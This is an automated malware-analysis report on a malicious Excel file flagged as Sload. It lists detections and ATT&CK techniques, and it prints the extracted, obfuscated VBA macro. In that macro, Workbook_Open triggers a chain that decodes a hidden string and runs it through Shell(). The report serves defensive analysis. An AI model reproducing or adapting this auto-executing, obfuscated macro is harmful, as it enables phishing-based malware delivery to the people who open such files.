MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The file is an Excel document containing a Workbook_Open VBA macro. This macro utilizes the Shell() function, a critical heuristic firing, to execute arbitrary commands. This indicates the document is designed to download and execute a secondary payload upon opening. The ClamAV detection and other heuristics further support its malicious nature.
Heuristics 6
-
ClamAV: Xls.Malware.Sload-6923033-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Sload-6923033-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.day.com/dam/1.0 In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3997 bytes |
SHA-256: 87171e1779179abfe63c074848c07903db13f8c026683c2ca148ccc924771d63 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
al = "al1"
al = "al2"
GetArrayLength al
al = "al3"
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "SIGSEGV"
Attribute VB_Base = "0{30419A45-03FD-4AE8-84ED-7E7A386D3D6B}{26C63B84-A2FA-45B2-9533-0B0105293B87}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub NO_UNIX_BACKTRACE_SUPPORT_Change()
post = 66
post = 76
post = 28
post = 5
post = 68
post = 22
post = 2
post = 44
post = 8
post = 89
post = 92
post = 27
post = 18
post = 48
mapped = SIGSEGV.NO_UNIX_BACKTRACE_SUPPORT
post = 68
post = 86
post = 78
post = 55
post = 23
post = 83
post = 66
post = 78
post = 50
post = 42
post = 67
post = 99
post = 58
post = 1
post = 37
post = 68
post = 37
Shell mapped, 0
post = 30
post = 59
post = 76
post = 2
post = 43
post = 64
post = 59
post = 6
post = 28
post = 48
post = 47
post = 19
post = 30
post = 10
post = 9
post = 43
post = 87
post = 66
post = 99
End Sub
Private Sub cfgfolder_Change()
libc
End Sub
Attribute VB_Name = "strchr"
Public Sub libc()
nh = ""
named SIGSEGV.fler, nh
SIGSEGV.must = nh
SIGSEGV.NO_UNIX_BACKTRACE_SUPPORT = SIGSEGV.must
End Sub
Attribute VB_Name = "declare7"
Sub named(License, ByRef educated)
educated = ""
pStackWalk64 = 1
available pStackWalk64, educated, License
End Sub
Sub available(ByRef doConvert, ByRef tries, symbolString)
see = Len(symbolString)
If doConvert <= see Then
gem = ""
getErrorMessages symbolString, doConvert, gem
dc = 1
dependency gem, dc
csa = ""
callstackArray dc - 1, csa
tries = tries + csa
doConvert = doConvert + 1
available doConvert, tries, symbolString
End If
End Sub
Sub getErrorMessages(ULONG, below, ByRef inline)
inline = Right(Left(ULONG, below), 1)
End Sub
Sub callstackArray(operation, ByRef redistribute)
redistribute = ""
If operation < 1 Then
getErrorMessages SIGSEGV.si_code, Len(SIGSEGV.si_code) + operation, redistribute
Else
getErrorMessages SIGSEGV.si_code, operation, redistribute
End If
End Sub
Sub NO_UNIX_SIGNAL_HANDLING(ByRef found, ByRef NULL7, fpSymGetSymFromAddr64)
If found < Len(SIGSEGV.si_code) Then
gem = ""
getErrorMessages SIGSEGV.si_code, found, gem
If fpSymGetSymFromAddr64 <> gem Then
found = found + 1
NO_UNIX_SIGNAL_HANDLING found, NULL7, fpSymGetSymFromAddr64
Else
NULL7 = found
End If
End If
End Sub
Sub dependency(fpSymGetSymFromAddr64, ByRef NULL7)
found = 1
NULL7 = 1
NO_UNIX_SIGNAL_HANDLING found, NULL7, fpSymGetSymFromAddr64
End Sub
Attribute VB_Name = "just"
Public Sub GetArrayLength(internal)
SIGSEGV.cfgfolder = internal
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.